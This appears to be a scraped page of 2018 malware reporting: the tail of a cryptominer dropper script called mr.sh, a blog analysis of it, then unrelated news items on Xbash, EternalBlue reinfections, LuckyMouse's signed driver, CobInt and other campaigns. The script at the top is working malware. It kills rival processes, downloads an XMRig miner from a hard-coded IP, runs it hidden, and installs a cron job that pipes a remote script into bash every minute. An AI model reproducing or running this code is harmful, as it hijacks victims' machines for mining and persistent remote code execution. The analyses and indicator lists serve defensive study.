sum=$(md5sum /var/tmp/sustes | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
;;
*)
echo "sustes wrong"
pkill -f wc.conf
pkill -f sustes
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/sustes" ]
then
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="192.99.142.226:8220"
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/sustes ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
;;
*)
echo "sustes wrong"
sizeBefore=$(du $DIR/sustes)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
#$WGET $DIR/sustes https://transfer.sh/wbl5H/sustes
download
sumAfter=$(md5sum $DIR/sustes | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustes` > $DIR/var/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustes3 | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
cp $DIR/sustes3 $DIR/sustes
;;
*)
echo "sustes wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/sustes http://192.99.142.226:8220/xm64
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
echo $sum
case $sum in
c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
echo "sustes OK"
cp $DIR/sustes $DIR/sustes3
;;
*)
echo "sustes wrong"
;;
esac
else
echo "No md5sum"
fi
}
judge() {
if [ ! "$(netstat -ant|grep '158.69.133.20\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ];
then
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
do
kill -9 $procid
done
downloadIfNeed
touch /var/tmp/123
pkill -f /var/tmp/java
pkill -f w.conf
chmod +x $DIR/sustes
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}
judge2() {
if [ ! "$(ps -fe|grep '/var/tmp/sustes'|grep 'wc.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/sustes
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
judge2
else
judge
fi
if crontab -l | grep -q "192.99.142.226:8220"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
rm -rf /var/tmp/jrm
rm -rf /tmp/jrm
pkill -f 185.222.210.59
pkill -f 95.142.40.81
pkill -f 192.99.142.232
chmod 777 /var/tmp/sustes
crontab -l | sed '/185.222.210.59/d' | crontab -
view rawmr hosted with ❤ by GitHub
An initial connection-check wants to take down unwanted software on the victim side (awk ‘{print $7}’ | sed -e “s/\/.*//g”) taking decisions upon specific IP addresses. It filters PID from connection states and it directly kills them (kill -9). The extracted attacker’s unwanted communications are the following ones:
103[.]99[.]115[.]220 (Org: HOST EDU (OPC) PRIVATE LIMITED, Country: IN)
104[.]160[.]171[.]94 (Org: Sharktech Country: USA)
121[.]18[.]238[.]56 (Org: ChinaUnicom, Country: CN)
170[.]178[.]178[.]57 (Org: Sharktech Country: USA)
27[.]155[.]87[.]59 (Org: CHINANET-FJ Country: CN)
52[.]15[.]62[.]13 (Org: Amazon Technologies Inc., Country: USA)
52[.]15[.]72[.]79 (Org: HOST EDU (OPC) PRIVATE LIMITED, Country: IN)
91[.]236[.]182[.]1 (Org: Brillant Auto Kft, Country: HU)
A second check comes from “command lines arguments”. Sustes “greps” to search for configuration files (for example: wc.conf and wq.conf and wm.conf) then it looks for software names such as sustes (here we go !) and kills everything matches the “grep”. The script follows by assigning to f2 variable the dropping website (192[.]99[.]142[.]226:8220) and later-on it calls “f2” adding specific paths (for example: /xm64 and wt.conf) in order to drop crafted components. MR.sh follows by running the dropped software with configuration file as follows:
nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
MR.SH ends up by setting a periodic crontab action on dropping and executing itself by setting up:
crontab -l 2>/dev/null; echo “* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1”
Following the analysis and extracting the configuration file from dropping URL we might observe the Monero wallet addresses and the Monero Pools used by attacker. The following wallets (W1, W2, W3) were found.
W1: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
W2: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
W3: 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
Quick analyses on the used Monero pools took me to believe the attacker built up a custom and private (deployed on private infrastructures) Monero pool/proxies, for such a reason I believe it would be nice to monitor and/or block the following addresses:
158[.]69[.]133[.]20 on port 3333
192[.]99[.]142[.]249 on port 3333
202[.]144[.]193[.]110 on port 3333
The downloaded payload is named sustes and it is a basic XMRIG, which is a well-known opensource miner. In this scenario, it is used to make money at the expense of computer users by abusing the infected computer to mine Monero, a cryptocurrency. The following image shows the usage strings as an initial proof of software.
XMRIG prove 1
Many people are currently wondering what is the sustes process which is draining a lot of PC resources (for example: here, here and here ) …. now we have an answer: it’s an unwanted Miner. :D.
Hope you had fun
Further details including the IoC area available at:
https://marcoramilli.blogspot.com/2018/09/sustes-malware-cpu-for-monero.html
Destructive Xbash Linux Malware Targets Enterprise Intranets
20.9.2018 securityweek Virus
A newly discovered piece of Linux malware that features both ransomware and crypto-currency mining capabilities appears designed to target enterprise intranets, Palo Alto Networks security researchers say.
Dubbed Xbash and believed to be tied to the Iron Group, a threat actor known for previous ransomware attacks, the malware can target both Linux and Windows servers.
It contains a Python class that allows it to find IP addresses on a subnet and scan the ports on these IPs, likely to spread to the local network. In addition to self-propagating capabilities, the malware contains functionality not yet implemented that could allow it to spread fast within an organization’s network.
The servers that provide services internally on an enterprise network are more likely to be configured with weak credentials or to be unprotected compared to those accessible over the public web.
“We believe that is the main motivation of Xbash’s Intranet scanning code. If events like WannaCry and NotPetya are any guide, this intranet functionality could make Xbash even more devastating once it’s enabled,” Palo Alto Networks says.
Xbash, the researchers discovered, spreads by targeting weak passwords and unpatched vulnerabilities.
As part of its ransomware capabilities, it destroys Linux-based databases. It deletes resources such as MySQL, PostgreSQL and MongoDB databases, but contains no functionality that would allow their recovery once a ransom has been paid. The malware can ensnare targeted Linux-based systems in a botnet.
The Microsoft Windows-based systems, on the other hand, are only targeted for crypto-mining and self-propagation (it uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for spreading), the security researchers have discovered.
To date, the malware made at least 48 victims who already paid the ransom, incoming transactions to the used wallets reveal. The cybercriminals behind the threat made about 0.964 Bitcoin ($6,000) to date.
Developed using Python, Xbash was then converted into self-contained Linux ELF executables using PyInstaller, which can create binaries for multiple platforms and also provides anti-detection. The malware fetches from the command and control (C&C) server the list of IP addresses to target.
The security researchers discovered four versions of Xbash so far and concluded that the malware is under active development. The botnet appears to have started operating as early as May 2018.
The malware has multiple domains hard-coded and also fetches a webpage hosted on Pastebin to update the list (some of the domains have been previously associated with the Iron Group). Communication with the C&C is performed using HTTP.
In addition to IP addresses, Xbash targets domains, the security researchers say. This makes the threat a next step in the evolution of botnets, as they normally only target IPs.
The malware scans many TCP or UDP ports for spreading purposes, namely those associated with HTTP, VNC, MySQL, Memcached, MySQL/MariaDB, FTP, Telnet, PostgreSQL, Redis, ElasticSearch, MongoDB, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, Rsync, Oracle database, and CouchDB.
“Xbash is a novel and complex Linux malware, and the newest work of an active cybercrime group,” Palo Alto Networks concludes.
Cracked Windows installations are serially infected with EternalBlue exploit code
18.9.2018 securityaffairs Virus
According to Avira, hundreds of thousands of unpatched Windows systems are serially infected with EternalBlue exploit code.
The EternalBlue, is the alleged NSA exploit that made the headlines with DOUBLEPULSAR in the WannaCry attack.
The malicious code was leaked online by the Shadow Brokers hacking group that stole it from the arsenal of the NSA-linked Equation Group.
ETERNALBLUE targets the Server Message Block SMBv1 protocol on port 445, it has become widely adopted in the community of malware developers to target Windows 7 and Windows XP systems.
Microsoft addressed the flaw with the MS17-010 and also released an emergency patch for Windows XP and Server 2003 in response to the WannaCry ransomware attacks.
According to a new blog post published by Avira, unpatched systems remain exposed to cyber attacks and are serially infected by threat actors.
“There are still significant numbers of repeatedly infected machines more than a year after the big WannaCry and Petya attacks,” said Mikel Echevarria-Lizarraga, senior virus analyst in the Avira Protection Lab.
“Our research has linked this to Windows machines that haven’t been updated against the NSA Eternal Blue exploit and are an open target for malware.”
The number of unpatched systems exposed online is very high, experts pointed out that most of them have been infected multiple times, they were found to run cracked Windows installations this means that they did not receive Microsoft’s security updates.
“We were researching the reasons behind a number of machines having repeated infections,” added Mikel. “We’ve found that many of these serially infected machines were running activation cracks which means that they cannot or do not want to update Windows and install updates. It also means that they did not receive the March 2018 emergency patch from Microsoft for this vulnerability.”
Avira decided to turn off the SMB1 protocol entirely on the infected machine to stop the endless infection loop.
The experts discovered around 300,000 computers affected by the issue and the Avira Protection whatever is deactivating the SMB1 protocol on around 14,000 computers daily.
The list of the top ten countries for serially infected machines is:
Indonesia
Taiwan
Vietnam
Thailand
Egypt
Russia
China
Philippines
India
Turkey
The above list doesn’t surprise the experts, according to studies from Statista, the above countries are top nations for the use of unlicensed software.
“The predominance of infected machines outside of North America and Europe roughly parallels studies from Statista on the use of unlicensed software.” concluded AVIRA.
“This study found unlicensed software rates averaging around 52 – 60% outside the United States and the European Union and fell to 16% and 28% respectively in these areas. Unlicensed software is usually unable to get the latest patches against vulnerabilities such as EternalBlue.”
EternalBlue-Vulnerable Systems Serially Infected
18.9.2018 securityweek Virus
Windows machines that haven’t been patched against the National Security Agency-linked EternalBlue exploit are stuck in an endless loop of infection, Avira warns.
The EternalBlue exploit, which the Shadow Brokers hacking group stole from the NSA-linked Equation Group, is best known for its role in the WannaCry outbreak last year.
The ransomware hit mostly Windows 7 and Windows XP machines, and for good reason. Its spread mechanism was targeting a vulnerability in Windows’ Server Message Block (SMB) on port 445, which mainly impacted those platform iterations.
The exploit was made public a month after Microsoft released a patch for the vulnerability it targets, but hundreds of thousands of systems continue to be vulnerable today, Avira says. An emergency patch was also released for Windows XP.
The unpatched systems remain exposed to any malware that abuses the EternalBlue exploit and, as Avira senior virus analyst Mikel Echevarria-Lizarraga points out, many of these systems are serially infected.
“There are still significant numbers of repeatedly infected machines more than a year after WannaCry. […] Our research has linked this to Windows machines that haven’t been updated against the NSA Eternal Blue exploit and are an open target for malware,” he says.
The number of unpatched systems, he reveals, is very high, but there’s an explanation for that. Many of the systems that have been infected multiple times were found to run activation cracks. This means that they did not receive Microsoft’s patches.
Without the official patch, users should turn off the older SMB1 protocol entirely on these machines to stay protected, the security researcher says.
Avira says they decided to take this security measure on the machines they found to be missing the patch and that this led to the discovery of around 300,000 computers affected by the issue.
Avira says they are deactivating the vulnerable protocol on around 14,000 systems each day and that the protective measure appears to be paying off.
“The strategy is working. Once the SMB1 protocol is deactivated, we don’t see the same machines affected again and again with this problem,” he says.
The top 10 impacted countries, Avira reveals, are Indonesia, Taiwan, Vietnam, Thailand, Egypt, Russia, China, Philippines, India, and Turkey. The numbers are in line with the findings of studies from Statista on the use of unlicensed software, Avira’s Lyle Frink says.
According to these studies, the unlicensed software rates are of around 52 – 60% outside the United States and the European Union. In these areas, the rates are of only 16% and 28%, respectively.
“Unlicensed software is usually unable to get the latest patches against vulnerabilities such as EternalBlue,” Frink underlines.
New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms
18.9.2018 securityaffairs Ransomware Virus
Palo Alto Network researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms
Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed XBash piece that is targeting both Linux and Microsoft Windows servers.
Xbash was developed using Python, then the authors converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution.
The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.
“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.
“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”
The malicious code was attributed to a popular crime gang tracked as the Iron Group.
The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.
“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.
“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”
Thousands of victims have been infected by malware used by the crime gang.
Now the experts from Palo Alto Networks discovered the new XBash malware strain that combines botnet, coinmining, ransomware, and self-propagation. The botnet and ransomware features are observed in infections of Linux systems, while a coinminer behavior was seen in infections of the Windows servers.
The Xbash authors have implemented scanning capabilities used by the malware to search for vulnerable servers online. The malicious code search for unpatched web applications that are vulnerable to a series of known exploits or to brute force attack with a dictionary of default credentials.
“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.
“Three known vulnerabilities are targeted:
Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”
The malware can infect Windows systems, only after the compromise of a vulnerable Redis server.
The scanner component also scans the Internet for servers that run services that have been left online exposed without a password or are using weak credentials. The scanners target web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.
Hackers attempt to monetize their efforts through coin-mining activities on Windows systems or with ransomware based attacks on Linux servers running database services.
The XBash component will scan and delete MySQL, MongoDB, and PostgreSQL databases and drops a ransom asking for the payment of 0.02 Bitcoin ($125) to recover them.
Xbash 
Unfortunately, victims will never recover their data because the malware wipe data and not back it up.
“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.
“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”
Experts noticed in all versions of Xbash the presence of a Python class named “LanScan” used to target enterprise networks. The class allows to get local intranet information, generate a list of all IP addresses within the same subnet, and to perform port scanning to all these IPs
The code is still not active in the malware, likely crooks are working on its development.
Experts believe XBash will continue to evolve, for example including the miner component for Linux servers as well.
Further info, including IoCs, are reported in the analysis published by the experts.
LuckyMouse signs malicious NDISProxy driver with certificate of Chinese IT company
16.9.2018 Kaspersky Virus
What happened?
Since March 2018 we have discovered several infections where a previously unknown Trojan was injected into the lsass.exe system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.
The campaign described in this report was active immediately prior to Central Asian high-level meeting and we suppose that actor behind still follows regional political agenda.
Which malicious modules are used?
The malware consists of three different modules:
A custom C++ installer that decrypts and drops the driver file in the corresponding system directory, creates a Windows autorun service for driver persistence and adds the encrypted in-memory Trojan to the system registry.
A network filtering driver (NDISProxy) that decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic in order to insert the Trojan’s C2 communications into it.
A last-stage C++ Trojan acting as HTTPS server that works together with the driver. It waits passively for communications from its C2, with two possible communication channels via ports 3389 and 443.
NDISProxy driver and RAT work together once the installer has set up all the modules
These modules allow attackers to silently move laterally in the infected infrastructure, but don’t allow them to communicate with an external C2 if the new infected host only has a LAN IP. Because of this, the operators used an Earthworm SOCKS tunneler in order to connect the LAN of the infected host to the external C2. They also used the Scanline network scanner to find file shares (port 135, Server Message Block, SMB) which they use to spread malware with administrative passwords, compromised with keyloggers.
We assess with high confidence that NDISProxy is a new tool used by LuckyMouse. Kaspersky Lab products detect the described artefacts. For more information please contact: intelreports@kaspersky.com
How does it spread?
We detected the distribution of the 32-bit dropper used for this campaign among different targets by the end of March 2018. However, we didn’t observe any spear phishing or watering hole activity. We believe the operators spread their infectors through networks that were already compromised instead.
How does it work?
Custom installer
Installer MD5 hash Timestamp (GMT) Size Bits
dacedff98035f80711c61bc47e83b61d 2018.03.29 07:35:55 572 244 32
9dc209f66da77858e362e624d0be86b3 2018.03.26 04:16:00 572 244 32
3cbeda2c5ac41cca0b0d60376a2b2511 2018.03.26 04:16:00 307 200 32
The initial infectors are 32-bit portable executable files capable of installing 32-bit or 64-bit drivers depending on the target. The installer logs all the installation process steps in the load.log file within the same directory. It checks if the OS is Windows Vista or above (major version equal to 6 or higher) and decrypts its initial configuration using the DES (Data Encryption Standard) algorithm.
The set of well-known port numbers (HTTP, HTTPS, SMB, POP3S, MSSQL, PPTP and RDP) in the configuration is not used, which along with the “[test]” strings in messages suggests this malware is still under development.
The installer creates a semaphore (name depending on configuration) Global\Door-ndisproxy-mn and checks if the service (name also depends on configuration) ndisproxy-mn is already installed. If it is, the dropper writes “door detected” in load.log. The autorun Windows service running NDISProxy is the “door” in developer terms.
The installer also decrypts (using the same DES) the shellcode of the last stage Trojan and saves it in three registry values named xxx0, xxx1, xxx2 in key HKLM\SOFTWARE\Classes\32ndisproxy-mn (or 64ndisproxy-mn for 64-bit hosts). The encrypted configuration is saved as the value filterpd-ndisproxy-mn in the registry key HKCR\ndisproxy-mn.
Initial installer saves XOR-encrypted Trojan’s shellcode and DES-encrypted configuration in system registry
The installer creates the corresponding autostart service and registry keys. The “Altitude” registry value (unique ID for the minifilter driver) is set to 321 000, which means “FSFilter Anti-Virus” in Windows terms:
NDISProxy network filtering driver
Driver MD5 hash Timestamp Size Bits
8e6d87eadb27b74852bd5a19062e52ed 2018.03.29 07:33:58 40400 64
d21de00f981bb6b5094f9c3dfa0be533 2018.03.29 07:33:52 33744 32
a2eb59414823ae00d53ca05272168006 2018.03.26 04:15:28 40400 64
493167e85e45363d09495d0841c30648 2018.03.26 04:15:21 33744 32
ad07b44578fa47e7de0df42a8b7f8d2d 2017.11.08 08:04:50 241616 64
This digitally signed driver is the most interesting artefact used in this campaign. The network filtering modules serve two purposes: first they decrypt and inject the RAT; second, they set its communication channel through RDP port 3389.
The drivers are signed with a digital certificate issued by VeriSign to LeagSoft, a company developing information security software such as data loss prevention (DLP) solutions.
This driver makes extensive use of third-party publicly available C source code, including from the Blackbone repository available at GitHub.
Feature Public repository
Driver memory injection Blackbone https://github.com/DarthTon/Blackbone
NDIS network filtering driver Microsoft Windows Driver Kit (WDK) sample code “Windows Filtering Platform Stream Edit Sample/C++/sys/stream_callout.c”
Parse HTTP packets Http-parser https://github.com/nodejs/http-parser
The driver again checks if the Windows version is higher than Vista, then creates a device named \\Device\\ndisproxy-%s (where the word after “-” varies – see Appendix for all variants) and its corresponding symbolic link \\DosDevices\\Global\\ndisproxy-%s.
The driver combines all the Trojan-related registry values from HKLM\SOFTWARE\Classes\32ndisproxy-mn and de-XORs them with a six-byte hardcoded value. It then injects the resulting Trojan executable shellcode into lsass.exe memory using Blackbone library functions.
NDISProxy works as a network traffic filter engine, filtering the traffic going through RDP port 3389 (the port number is hardcoded) and injecting messages into it.
The communication between the user-mode in-memory Trojan and the driver goes through the custom control codes used by the DeviceIoControl() Windows API function. Apart from the auxiliary codes, there are two codes worth mentioning:
Driver control code Meaning
0x222400 Start traffic filtering at RDP port 3389
0x22240C Inject given data into filtering TCP stream. Used for Trojan communication with C2
In-memory C++ Trojan
SHA256 c69121a994ea8ff188510f41890208625710870af9a06b005db817934b517bc1
MD5 6a352c3e55e8ae5ed39dc1be7fb964b1
Compiled 2018.03.26 04:15:48 (GMT)
Type I386 Windows GUI DLL
Size 175 616
Please note this Trojan exists in memory only; the data above is for the decrypted Windows registry content without the initial shellcode
This RAT is decrypted by the NDISProxy driver from the system registry and injected into the lsass.exe process memory. Code starts with a shellcode – instead of typical Windows portable executable files loader this malware implements memory mapping by itself.
This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands.
The Trojan is an HTTP server, allowing LAN connection. It uses a SOCKS tunneler to communicate with the C2
This Trojan is used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.
Who’s behind it and why?
We found that this campaign targeted Middle Asian governments’ entities. We believe the attack was highly targeted and was linked to a high-level meeting. We assess with high confidence that the Chinese-speaking LuckyMouse actor is responsible for this new campaign using the NDISProxy tool described in this report.
In particular, the choice of the Earthworm tunneler is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (“-s rssocks -d 103.75.190[.]28 -e 443”) creates a tunnel to a previously known LuckyMouse C2. The choice of victims in this campaign also aligns with the previous interests shown by this actor.
Consistent with current trends
We have observed a gradual shift in several Chinese-speaking campaigns towards a combination of publicly available tools (such as Metasploit or CobaltStrike) and custom malware (like the C++ last stage RAT described in this report). We have also observed how different actors adopt code from GitHub repositories on a regular basis. All this combines to make attribution more difficult.
This campaign appears to demonstrate once again LuckyMouse’s interest in Central Asia and the political agenda surrounding the Shanghai Cooperation Organization.
Indicators of Compromise
Note: The indicators in this section are valid at the time of publication. Any future changes will be updated directly in the corresponding .ioc file.
File Hashes
Droppers-installers
9dc209f66da77858e362e624d0be86b3
dacedff98035f80711c61bc47e83b61d
Drivers
8e6d87eadb27b74852bd5a19062e52ed
d21de00f981bb6b5094f9c3dfa0be533
a2eb59414823ae00d53ca05272168006
493167e85e45363d09495d0841c30648
ad07b44578fa47e7de0df42a8b7f8d2d
Auxiliary Earthworm SOCKS tunneler and Scanline network scanner
83c5ff660f2900677e537f9500579965
3a97d9b6f17754dcd38ca7fc89caab04
Domains and IPs
103.75.190[.]28
213.109.87[.]58
Semaphores
Global\Door-ndisproxy-mn
Global\Door-ndisproxy-help
Global\Door-ndisproxy-notify
Services
ndisproxy-mn
ndisproxy-help
ndisproxy-notify
Registry keys and values
HKLM\SOFTWARE\Classes\32ndisproxy-mn
HKLM\SOFTWARE\Classes\64ndisproxy-mn
HKCR\ndisproxy-mn\filterpd-ndisproxy-mn
HKLM\SOFTWARE\Classes\32ndisproxy-help
HKLM\SOFTWARE\Classes\64ndisproxy-help
HKCR\ndisproxy-mn\filterpd-ndisproxy-help
HKLM\SOFTWARE\Classes\32ndisproxy-notify
HKLM\SOFTWARE\Classes\64ndisproxy-notify
HKCR\ndisproxy-mn\filterpd-ndisproxy-notify
Driver certificate
A lot of legitimate LeagSoft products are signed with the following certificate. Please don’t consider all signed files as malicious.
Subject ShenZhen LeagSoft Technology Co.,Ltd.
Serial number 78 62 07 2d dc 75 9e 5f 6a 61 4b e9 b9 3b d5 21
Issuer VeriSign Class 3 Code Signing 2010 CA
Valid to 2018-07-19
Multi-Stage Malware Heavily Used in Recent Cobalt Attacks
14.9.2018 securityweek Attack Virus
The Russia-based Cobalt hacking group has made heavy use of the CobInt malware in recently observed campaigns, Proofpoint’s security researchers warn.
The Cobalt Gang appeared to have stopped using the malware as a first-stage downloader earlier this year, but an August campaign targeting Russian and Romanian banks revealed that they are using it again.
Known for targeting financial institutions worldwide, the group has also launched cyberattacks against organizations in the government, telecom/Internet, service providers, manufacturing, entertainment, and healthcare industries.
Since July, the multi-stage CobInt malware has been a constant presence in the threat actor’s attacks, delivered via malicious Office documents built using the ThreadKit exploit builder.
The malicious documents are targeting recent vulnerabilities in Microsoft Office, namely CVE-2017-8570, CVE-2017-11882, and CVE-2018-0802. The malicious files either attempt to drop a stage 1 payload or link to the CobInt downloader directly.
Between August 2 and September 4, Proofpoint detected four Cobalt attacks attempting to drop CobInt. The most recent of the incidents leveraged an Office document with a relationship object to fetch an external VBscript exploiting CVE-2018-8174 for the payload’s execution.
Written in C, CobInt is a downloader malware that can be broken up into three stages: an initial downloader, the main component, and additional modules.
The first stage’s purpose is to download the main CobInt component. It features encrypted command and control (C&C) host and URI, hides its functionality through the use of Windows API function hashing, and downloads the next stage via HTTPS.
CobInt’s main component is downloaded in the form of a DLL that stage 1 also executes. The main component fetches and runs various modules from the C&C. The malware uses HTTPS to communicate with the server.
Proofpoint’s researchers discovered four commands that the C&C server can send to the malware: load/execute module; stop polling C&C; execute function set by module; and update C&C polling wait time.
Loaded as shellcode, the modules start executing at the indicated entry point. The malware was observed loading two modules from the C&C, one to send a screenshot to the server, and the other to send a list of running process names.
These, Proofpoint notes, are reconnaissance steps that the attackers are likely to follow with the deployment of additional modules to the compromised systems of interest.
“CobInt provides additional evidence that threat actors […] are increasingly looking to stealthy downloaders to initially infect systems and then only install additional malware on systems of interest. […] This appears to be the latest trend as threat actors look to increase their effectiveness and differentiate final payloads based on user profiles,” Proofpoint concludes.
USB Drives shipped with Schneider Solar Products were infected with malware
7.9.2018 securityaffairs Virus
Schneider Electric announced that some of the USB drives it has shipped with its Conext ComBox and Conext Battery Monitor products were infected with malware.
Schneider Electric has found a malicious code on the USB drives that have been shipped with Conext ComBox and Conext Battery Monitor products.
Both products are part of the solar energy offering of the vendor. ComBox is a communications and monitoring device for installers and operators of Conext solar systems. Conext Battery Monitor indicates hours of battery based runtime and determines battery bank state of charge.
The tainted drives have been shipped with all versions of Conext ComBox (sku 865-1058) and all versions of Conext Battery Monitor (sku 865-1080-01).
Schneider revealed that the USB drives were infected with a malware during manufacturing at a third-party supplier’s facility.
“Schneider Electric is aware that USB removable media shipped with the Conext Combox and Conext Battery Monitor products may have been exposed to malware during manufacturing at a third-party supplier’s facility.” reads the security advisory published by the company.
The good news for customers is that the malware that was found on the USB drives was easy to detect for almost any anti-virus software, anyway the company is recommending customers to not to use them and “securely discard” the infected devices.
“Schneider Electric has confirmed that the malware should be detected and blocked by all major anti-malware programs. Out of caution, Schneider Electric recommends that these USB removable media are not used.” continues the advisory.
“These USB removable media contain user documentation and non-essential software utilities. They do not contain any operational software and are not required for the installation, commissioning, or operation of the products mentioned above. This issue has no impact on the operation or security of the Conext Combox or Conext Battery Monitor products,”
Users who believe they may have used the infected USB drives must scan their system for the presence of the malicious code.
At the time it is not clear the extent of the incident, anyway, this case is just the latest in a series of supply chain attacks observed in the last years.
We reported several cases of pre-installed malware and also cases quite similar to this one, like the one that involved last year IBM Storwize shipped with infected initialization USB drives.
GOBLIN PANDA Targets Vietnam Again
5.9.2018 securityweek Virus
CrowdStrike security researchers have observed renewed activity associated with GOBLIN PANDA, a threat actor mainly targeting entities in Southeast Asia.
First observed in 2013 and highly active in 2014, when a conflict over territory in the South China Sea was generating high tension, GOBLIN PANDA is known to focus on Vietnam. Also referred to as Cycldek, the actor has been primarily targeting entities in the defense, energy, and government sectors.
Last month, the group was observed targeting Vietnam once again, as part of a campaign that employed exploit documents featuring Vietnamese-language lures and themes. The adversary-controlled infrastructure leveraged as part of the attacks was Vietnam-themed as well.
The security researchers observed two exploit documents with Vietnamese-language file names that packed metadata unique to the GOBLIN PANDA adversary. When opened, the files display Microsoft Office Word documents with training-related themes as decoys.
“These documents did not specifically reference Vietnamese government projects or departments, however they could still be directed towards Government of Vietnam personnel,” CrowdStrike says.
